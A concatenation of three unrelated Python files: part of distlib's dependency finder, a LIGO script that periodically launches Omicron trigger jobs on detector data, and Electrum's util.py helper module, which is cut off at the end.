del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError: # pragma: no cover
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distribution which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(('cantreplace', provider, other,
frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ':*:' in meta_extras:
meta_extras.remove(':*:')
# :meta: and :run: are implicitly included
meta_extras |= set([':test:', ':build:', ':dev:'])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug('passed %s as requirement', odist)
else:
dist = odist = self.locator.locate(requirement,
prereleases=prereleases)
if dist is None:
raise DistlibException('Unable to locate %r' % requirement)
logger.debug('located %s', odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
#import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if meta_extras and dist in install_dists:
for key in ('test', 'build', 'dev'):
e = ':%s:' % key
if e in meta_extras:
ereqts |= getattr(dist, '%s_requires' % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug('No providers found for %r', r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug('Cannot satisfy %r', r)
problems.add(('unsatisfied', r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug('Adding %s to install_dists',
provider.name_and_version)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug('%s is a build-time dependency only.',
dist.name_and_version)
logger.debug('find done for %s', odist)
return dists, problems
|
mp_crawler.py | #!/usr/bin/python
usage = "crawler.py [--options] config.ini"
description = "a script that lives persistently and forks off Omicron jobs periodically"
author = "R. Essick (reed.essick@ligo.org)"
#import lal
from lal import gpstime
from pylal import Fr
import os
import sys ### only needed if we touch sys.stdout?
import multiprocessing as mp
import subprocess as sp
import numpy as np
import time
import logging
from ConfigParser import SafeConfigParser
from optparse import OptionParser
#=================================================
def __safe_fork(cmd, stdin=None, stdout=None, stderr=None):
"""
helper for a double fork. This is called by multiprocessing to orphan the actual processes
"""
if stdin:
stdin_obj = open(stdin, "r")
if stdout:
stdout_obj = open(stdout, "w")
if stderr:
stderr_obj = open(stderr, "w")
if stdin and stdout and stderr:
p = sp.Popen(cmd, stdin=stdin_obj, stdout=stdout_obj, stderr=stderr_obj) ### launch subprocess
### we don't wait, communicate or call
### by returning, this process will die and orphan the subprocess
elif stdin and stdout:
p = sp.Popen(cmd, stdin=stdin_obj, stdout=stdout_obj)
elif stdin and stderr:
p = sp.Popen(cmd, stdin=stdin_obj, stderr=stderr_obj)
elif stdout and stderr:
p = sp.Popen(cmd, stdout=stdout_obj, stderr=stderr_obj)
elif stdin:
p = sp.Popen(cmd, stdin=stdin_obj)
elif stdout:
p = sp.Popen(cmd, stdout=stdout_obj)
elif stderr:
p = sp.Popen(cmd, stderr=stderr_obj)
else:
p = sp.Popen(cmd)
if stdin:
stdin_obj.close()
if stdout:
stdout_obj.close()
if stderr:
stderr_obj.close()
###
def safe_fork(cmd, stdin=None, stdout=None, stderr=None):
"""
a wrapper for a double fork
"""
p = mp.Process(target=__safe_fork, args=(cmd, stdin, stdout, stderr)) ### define job
p.start() ### launch
p.join() ### call, will orphan subprocess when it finishes
###
def report(statement, verbose):
"""
wrapper for reporting output
"""
if verbose:
print statement
logger.info(statement)
###
def find_frames(ldr_server, ldr_url_type, ldr_type, ifo, start, stride, verbose=False):
"""
wrapper for ligo_data_find
"""
end = start+stride
cmd = "ligo_data_find --server=%s --url-type=%s --type=%s --observatory=%s --gps-start-time=%d --gps-end-time=%d"%(ldr_server, ldr_url_type, ldr_type, ifo, start, end)
report(cmd, verbose)
p = sp.Popen(cmd.split(), stdout=sp.PIPE, stderr=sp.STDOUT)
frames = p.communicate()[0].replace("No files found!", "").replace("\n", " ") ### handle an empty list appropriately
frames = frames.replace("file://localhost","")
return [l for l in frames.split() if l.endswith(".gwf")]
###
def coverage(frames, start, stride):
"""
determines the how much of [start, start+stride] is covered by these frames
assumes non-overlapping frames!
"""
### generate segments from frame names
segs = [[float(l) for l in frame.strip(".gwf").split("-")[-2:]] for frame in sorted(frames)]
### check whether segments overlap with desired time range
covered = 1.0*stride
end = start + stride
for s, d in segs:
e = s+d
if (s < end) and (start < e): ### at least some overlap
covered -= min(e, end) - max(s, start) ### subtract the overlap
if covered <= 0:
break
return 1 - covered/stride ### return fraction of coverage
###
def str_framecache(frames, ifo, type):
"""
build a string for the framecache
"""
S = ""
for frame in frames:
s, d = frame.strip(".gwf").split("-")[-2:]
S += "%s %s %s %s %s\n"%(ifo, type, s, d, frame)
return S
###
def extract_scisegs(frames, channel, bitmask, start, stride):
"""
extract scisegs from channel in frames using bitmask
"""
if not frames: ### empty list, so no segments
return []
### extract vectors and build segments
segset = []
for frame in frames:
### extract the vector from the frame
vect, s, ds, dt, xunit, yunit = Fr.frgetvect1d(frame, channel)
n = len(vect)
### build time vector add starting time
t = np.arange(0, dt*n, dt) + s+ds
### determine whether state acceptable
### add "False" buffers to set up the computation of start and end time
state = np.concatenate( ([False], vect == bitmask, [False]))
### determine beginning of segments
### i=False i+1 = True strip the trailing buffer
b = ( (1-state[:-1])*(state[1:]) )[:-1].astype(bool)
b = t[b] ### select out times
### determine end of segments
### i=True i+1=False strip the leading buffer
e = ( (state[:-1])*(1-state[1:]) )[1:].astype(bool)
e = t[e] + dt ### select out times
### extra dt moves these markers to the end of segments
### stitch together start and end times, append to global list
segset += list( np.transpose( np.array( [b, e] ) ) )
if not segset: ### empty list
return []
### clean up segs!
segs = []
seg1 = segset[0]
for seg2 in segset[1:]:
if seg1[1] == seg2[0]:
seg1[1] = seg2[1] ### join the segments
else:
segs.append( list(seg1) )
seg1 = seg2
segs.append( list(seg1) )
### return final list of lists!
return segs
###
def str_omicron_config(framecache, channels, samplefrequency=4096, chunkduration=32, blockduration=32, overlapduration=4, windows=[2,4], fftplan="ESTIMATE", frequencyrange=[32,2048], qrange=[3,141], mismatch=0.2, snrthreshold=5.5, nmax=1e6, clustering="time", outputdir="./", format=["xml"], verbosity=0, writepsd=0, writetimeseries=0, writewhiteneddata=0, plotstyle="GWOLLUM"):
"""
builds the string that represents the omicron parameter file
WARNING: may be sub-optimal if required extremely repetitively because of the way we concatenate strings
(strings are immutable in python, so we create many objects)
"""
s = ""
### data
s += "DATA\tLCF\t%s\n"%framecache
for item in channels.items():
s += "DATA\tCHANNELS\t%s\nDATA\tNATIVEFREQUENCY\t%d\n"%item
s += "DATA\tSAMPLEFREQUENCY\t%d\n"%samplefrequency
### parameters
s += "PARAMETER\tCHUNKDURATION\t%d\n"%chunkduration
s += "PARAMETER\tBLOCKDURATION\t%d\n"%blockduration
s += "PARAMETER\tOVERLAPDURATION\t%d\n"%overlapduration
s += "PARAMETER\tWINDOWS\t%s\n"%" ".join([str(w) for w in windows])
s += "PARAMETER\tFFTPLAN\t%s\n"%fftplan
s += "PARAMETER\tFREQUENCYRANGE\t%.4f\t%.4f\n"%tuple(frequencyrange)
s += "PARAMETER\tQRANGE\t%.4f\t%.4f\n"%tuple(qrange)
s += "PARAMETER\tMISMATCHMAX\t%.4f\n"%mismatch
### triggers
s += "TRIGGER\tSNRTHRESHOLD\t%.4f\n"%snrthreshold
s += "TRIGGER\tNMAX\t%d\n"%int(nmax)
s += "TRIGGER\tCLUSTERING\t%s\n"%clustering
### output
s += "OUTPUT\tDIRECTORY\t%s\n"%outputdir
s += "OUTPUT\tFORMAT\t%s\n"%(",".join(format))
s += "OUTPUT\tVERBOSITY\t%d\n"%verbosity
s += "OUTPUT\tWRITEPSD\t%d\n"%writepsd
s += "OUTPUT\tWRITETIMESERIES\t%d\n"%writetimeseries
s += "OUTPUT\tWRITEWHITENEDDATA\t%d\n"%writewhiteneddata
s += "OUTPUT\tPLOTSTYLE\t%s\n"%plotstyle
return s
###
def str_omicron_sub(universe, executable, arguments, log, output, error, getenv=True, notification="never"):
"""
builds a string that represents a condor sub file for omicron
"""
s = ""
s += "universe = %s\n"%universe
s += "executable = %s\n"%executable
s += "arguments = %s\n"%" ".join(arguments)
# s += "arguments = %s\n"%" ".join(["$(%s)"%a for a in arguments])
s += "log = %s\n"%log
s += "output = %s\n"%output
s += "error = %s\n"%error
s += "notification = %s\n"%notification
s += "queue 1\n"
return s
#=================================================
parser = OptionParser(usage=usage, description=description)
parser.add_option("-v", "--verbose", default=False, action="store_true")
parser.add_option("", "--no-robot-cert", default=False, action="store_true", help="do not use robot cert specified in config file")
parser.add_option("-s", "--gps-start", default=None, type="int")
parser.add_option("-e", "--gps-end", default=np.infty, type="float")
opts, args = parser.parse_args()
if len(args) != 1:
raise StandardError("Please supply only a single argument")
configfile = args[0]
#=================================================
config = SafeConfigParser()
config.read(configfile)
#=================================================
### setup logger to record processes
logfilename = config.get("general","logfile")
### ensure that path to log will exist
logpath = "/".join(logfilename.split("/")[:-1])
if logfilename[0] == "/":
logpath = "/%s"%logpath
if not os.path.exists(logpath):
os.makedirs(logpath)
global logger
logger = logging.getLogger('crawler_log')
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(message)s')
### redirect stderr into logger
hdlr = logging.FileHandler(logfilename)
hdlr.setFormatter(formatter)
hdlr.setLevel(logging.INFO)
logger.addHandler(hdlr)
#=================================================
### source environment scripts
report("sourcing environment", opts.verbose)
for reason, script in config.items("environment"):
cmd = "source %s"%(script)
report(cmd, opts.verbose)
p = sp.Popen(cmd.split(), executable="/bin/bash", stdout=sp.PIPE)
report(p.communicate()[0].strip("\n"), opts.verbose)
if 0 != p.returncode:
raise StandardError("failed to source %s"%script)
### robot cert
if not opts.no_robot_cert:
if os.environ.has_key("X509_USER_PROXY"):
del os.environ['X509_USER_PROXY']
### set cert and key
os.environ['X509_USER_CERT'] = config.get('robot cert', 'robot_certificate')
os.environ['X509_USER_KEY'] = config.get('robot cert', 'robot_key')
#=================================================
report("pulling out parameters from : %s"%configfile, opts.verbose)
### pull out basic parameters
ifo = config.get("general", "ifo")
outputdir = config.get("general", "outputdir")
stride = config.getint("general", "stride")
delay = config.getint("general", "delay")
padding = config.getint("general", "padding")
max_wait = config.getint("general", "max_wait")
#========================
### pull out ldr params
ldr_server = config.get("ligo_data_find", "server")
ldr_url_type = config.get("ligo_data_find", "url-type")
ldr_type = config.get("ligo_data_find", "type")
#========================
### pull out sciseg params
sciseg_channel = config.get("scisegs","channel")
sciseg_bitmask = config.getint("scisegs","bitmask")
#========================
### pull out omicron run parameters
block = config.getboolean("omicron", "block") ### whether to block
condor = config.getboolean("omicron", "condor") ### whether to use condor
scisegs = config.getboolean("omicron","scisegs") ### whether to use scisegs
executable = config.get("omicron", "executable")
### output formatting
format = eval(config.get("omicron","format"))
verbosity = config.getint("omicron","verbosity")
writepsd = config.getint("omicron","writepsd")
writetimeseries = config.getint("omicron","writetimeseries")
writewhiteneddata = config.getint("omicron","writewhiteneddata")
plotstyle = config.get("omicron","plotstyle")
### set up params_string for each channel_set
params_strings = []
for section_name in sorted(config.options("channel sets")):
report("setting up template omicron params file for : %s"%section_name, opts.verbose)
params_strings.append( ( section_name,
str_omicron_config( "%s", # will be filled in later
dict( ("%s1:%s"%(ifo,key.upper()), float(value)) for key, value in config.items("%s channels"%section_name) ),
samplefrequency = config.getint(section_name,"samplefrequency"),
chunkduration = config.getint(section_name,"chunkduration"),
blockduration = config.getint(section_name,"blockduration"),
overlapduration = config.getint(section_name,"overlapduration"),
windows = eval(config.get(section_name,"windows")),
fftplan = config.get(section_name,"fftplan"),
frequencyrange = eval(config.get(section_name,"frequencyrange")),
qrange = eval(config.get(section_name,"qrange")),
mismatch = config.getfloat(section_name,"mismatch"),
snrthreshold = config.getfloat(section_name,"snrthreshold"),
nmax = config.getint(section_name,"nmax"),
clustering = config.get(section_name,"clustering"),
outputdir="%s", # will be filled in later
format=format,
verbosity=verbosity,
writepsd=writepsd,
writetimeseries=writetimeseries,
writewhiteneddata=writewhiteneddata,
plotstyle=plotstyle
)
)
)
### set up condor files if needed
if condor:
report("setting up condor sub files", opts.verbose)
### write sub template
report("building sub template", opts.verbose)
sub_string = str_omicron_sub("vanilla", executable, ["%s", "%s"], "%s", "%s", "%s", getenv=True, notification="never")
#=================================================
### setting up initial time
report("", opts.verbose)
if opts.gps_start == None:
t = ( int(gpstime.gps_time_now()) / stride)*stride
else:
t = (opts.gps_start/stride)*stride ### round to integer number of strides
#=================================================
# LOOP until we "finish"
#=================================================
while t < opts.gps_end:
report("=========================================================================", opts.verbose)
report("processing stride: [%d-%d, %d+%d]"%(t, padding, t+stride, padding), opts.verbose)
### wait to analyze this stride
nowgps = float( gpstime.gps_time_now() )
wait = (t+stride+padding) + delay - nowgps
if wait > 0:
report("sleeping for %d sec"%wait, opts.verbose)
time.sleep(wait)
### build directories
t5 = t/100000
segdir = "%s/segments/%s-%d/"%(outputdir, ifo, t5)
logdir = "%s/logs/%s-%d/"%(outputdir, ifo, t5)
framedir = "%s/frames/%s-%d/"%(outputdir, ifo, t5)
trgdir = "%s/triggers/%s-%d/"%(outputdir, ifo, t5)
for directory in [outputdir, segdir, logdir, framedir, trgdir]:
if not os.path.exists(directory):
report("building directory : %s"%directory, opts.verbose)
os.makedirs(directory)
if condor:
condordir = "%s/condor/%s-%d/"%(outputdir, ifo, t5)
if not os.path.exists(condordir):
report ("building directory : %s"%condordir, opts.verbose)
os.makedirs(condordir)
### find frames within time window
report("finding frames within stride", opts.verbose)
frames = find_frames(ldr_server, ldr_url_type, ldr_type, ifo, t-padding, stride+2*padding, verbose=opts.verbose)
covered = coverage( frames, t-padding, stride+2*padding) ### find out the coverage
### keep looking every second until we either find frames or time out
if covered < 1.0:
report("coverage = %.5f < 1.0, we'll check every second for more frames and wait at most %d seconds before proceeding."%(covered, max_wait), opts.verbose)
while (covered < 1.0) and ( (float(gpstime.gps_time_now()) - ( (t+stride+padding) + delay ) ) < max_wait ):
###
time.sleep( 1 ) # don't break the file system
###
frames = find_frames(ldr_server, ldr_url_type, ldr_type, ifo, t-padding, stride+2*padding, verbose=False) ### don't report this every time in the loop
covered = coverage( frames, t-padding, stride+2*padding) ### find out the coverage
if covered >= 1.0:
report("covered >= 1.0")
if covered < 1.0:
report("coverage = %.5f < 1.0, but we've timed out after waiting at least %d seconds."%(covered, max_wait), opts.verbose)
### write framecache
framecache = "%s/%s_%d-%d.lcf"%(framedir, ifo, t, stride)
report("writing framecache : %s"%framecache, opts.verbose)
framecache_obj = open(framecache, "w")
framecache_obj.write( str_framecache(frames, ifo, ldr_type) )
framecache_obj.close()
### if we have data, process it!
if not frames:
report("no frames found! skipping...", opts.verbose)
else:
### find scisegs
segfile = "%s/%s_%d-%d.seg"%(segdir, ifo, t, stride)
if scisegs: ### extract from ODC vector in frames
report("extracting scisegs to : %s"%(segfile), opts.verbose)
segs = extract_scisegs(frames, "%s1:%s"%(ifo, sciseg_channel), sciseg_bitmask, t-padding, t+stride+padding)
else: ### use entire segment for analysis
report("using analysis segment as scisegs", opts.verbose)
segs = [(t-padding, t+stride+padding)]
report("writing scisegs : %s"%segfile, opts.verbose)
file_obj = open(segfile, "w")
for a, b in segs:
file_obj.write("%d %d"%(a, b))
file_obj.close()
### launch jobs
if block: ### run from here and block
procs = []
for channel_set, params_string in params_strings: ### iterate over separate jobs
### write omicron params file
params = "%s/%s_%s-%d-%d.params"%(logdir, ifo, channel_set, t, stride)
report("writing params : %s"%params, opts.verbose)
file_obj = open(params, 'w')
file_obj.write(params_string%(framecache, trgdir))
file_obj.close()
out = "%s/%s_%s-%d-%d.out"%(logdir, ifo, channel_set, t, stride)
err = "%s/%s_%s-%d-%d.err"%(logdir, ifo, channel_set, t, stride)
cmd = "%s %s %s"%(executable, segfile, params)
report(cmd, opts.verbose)
report("out: %s"%out, opts.verbose)
report("err: %s"%err, opts.verbose)
out_obj = open(out, "w")
err_obj = open(err, "w")
procs.append( (cmd, sp.Popen(cmd.split(), stdout=out_obj, stderr=err_obj)) )
out_obj.close()
err_obj.close()
while procs:
cmd, p = procs.pop(0)
p.wait() ### block!
elif condor: ### run under condor
procs = []
for channel_set, params_string in params_strings: ### iterate over separate jobs
### write omicron params file
params = "%s/%s_%s-%d-%d.params"%(logdir, ifo, channel_set, t, stride)
report("writing params : %s"%params, opts.verbose)
file_obj = open(params, 'w')
file_obj.write(params_string%(framecache, trgdir))
file_obj.close()
log = "%s/%s_%s-%d-%d.log"%(logdir, ifo, channel_set, t, stride)
out = "%s/%s_%s-%d-%d.out"%(logdir, ifo, channel_set, t, stride)
err = "%s/%s_%s-%d-%d.err"%(logdir, ifo, channel_set, t, stride)
sub = "%s/%s_%s-%d-%d.sub"%(condordir, ifo, channel_set, t, stride)
report("sub: %s"%sub, opts.verbose)
report("log: %s"%log, opts.verbose)
report("out: %s"%out, opts.verbose)
report("err: %s"%err, opts.verbose)
### write sub
file_obj = open(sub, "w")
file_obj.write(sub_string%(segfile, params, log, out, err))
file_obj.close()
### submit through condor
cmd = "condor_submit %s"%sub
report(cmd, opts.verbose)
procs.append( (cmd, sp.Popen(cmd.split(), stdout=sys.stdout, stderr=sys.stderr)) )
while procs:
cmd, p = procs.pop(0)
p.wait()
else: ### run from here but do not block
for channel_set, params_string in params_strings: ### iterate over separate jobs
### write omicron params file
params = "%s/%s_%s-%d_%d-%d.params"%(logdir, ifo, channel_set, t, stride)
report("writing params : %s"%params, opts.verbose)
file_obj = open(params, 'w')
file_obj.write(params_string%(framecache, trgdir))
file_obj.close()
out = "%s/%s_%s-%d-%d.out"%(logdir, ifo, channel_set, t, stride)
err = "%s/%s_%s-%d-%d.err"%(logdir, ifo, channel_set, t, stride)
cmd = "%s %s %s"%(executable, segfile, params)
report(cmd, opts.verbose)
report("out: %s"%out, opts.verbose)
report("err: %s"%err, opts.verbose)
safe_fork(cmd.split(), stdout=out, stderr=err)
report("Done with stride: [%d-%d, %d+%d]"%(t, padding, t+stride, padding), opts.verbose)
### increment!
t += stride
|
util.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os, sys, re, json
import platform
import shutil
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urlparse
import urllib
import threading
from i18n import _
base_units = {'BTC':8, 'mBTC':5, 'uBTC':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
is_verbose = False
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=decimal.Decimal)
except:
return x
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.func_name
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.renpy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_path():
path = android_ext_dir() + '/org.electrum.electrum/blockchain_headers'
d = os.path.dirname(path)
if not os.path.exists(d):
os.mkdir(d)
return path
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_path()
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_path(config):
if 'ANDROID_DATA' in os.environ:
return android_headers_path()
else:
return os.path.join(config.path, 'blockchain_headers')
def user_dir():
if "HOME" in os.environ:
return os.path.join(os.environ["HOME"], ".electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum")
elif 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
'''Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator'''
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result.decode('utf8')
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
block_explorer_info = {
